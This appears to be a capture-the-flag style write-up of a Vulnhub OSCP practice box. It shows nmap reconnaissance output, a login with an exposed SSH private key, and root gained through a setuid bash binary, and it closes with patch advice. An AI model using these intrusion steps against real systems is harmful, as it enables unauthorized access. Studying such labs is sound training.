Vulnhub OSCP Prep WriteUp
Overview:
This is an OSCP prep box form Vulnhub Created by FalconSpy & InfoSec Prep Discord Server ( https://discord.gg/RRgKaep ), It’s relatively easy but still teach some good stuff for people who begins to prepare OSCP (I was one of them). The image can be found the link below. With all that being said, Let’s just jump in.
Reconnaissance:
ports=$(nmap -p- — min-rate=1000 -T4 192.168.170.154 | grep ^[0–9] | cut -d ‘/’ -f 1 | tr ‘\n’ ‘,’ | sed s/,$//)nmap -sC -sV -p$ports -v -oN sc 192.168.170.154PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 91:ba:0d:d4:39:05:e3:13:55:57:8f:1b:46:90:db:e4 (RSA)
| 256 0f:35:d1:a1:31:f2:f6:aa:75:e8:17:01:e7:1e:d1:d5 (ECDSA)
|_ 256 af:f1:53:ea:7b:4d:d7:fa:d8:de:0d:f2:28:fc:86:d7 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: WordPress 5.4.2
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_/secret.txt
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: OSCP Voucher – Just another WordPress site
33060/tcp open mysqlx?
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
| Invalid message”
|_ HY000
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
There are 3 ports open, 21, and 33060 are unlikely have vulnerability form external, So use gobuster to find directory on the server.
The Foothold:
Also check robots.txt just in case, but there is something on the server.
It shows a id_rsa Private key, So if we use ssh -I to signin by this key, We can login to the account without a password.
chmod 600 key.txt and ssh into OSCP’s account.
PriEsc to root:
Check setuid
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/nullThere is a bash setuid bits. So, run bash -p to spawn a root shell.
Patch the vulnerability:
1. Remove the secret file form the robots.txt directory.
2. Remove bash setuid that allows attacker to gain access to root.
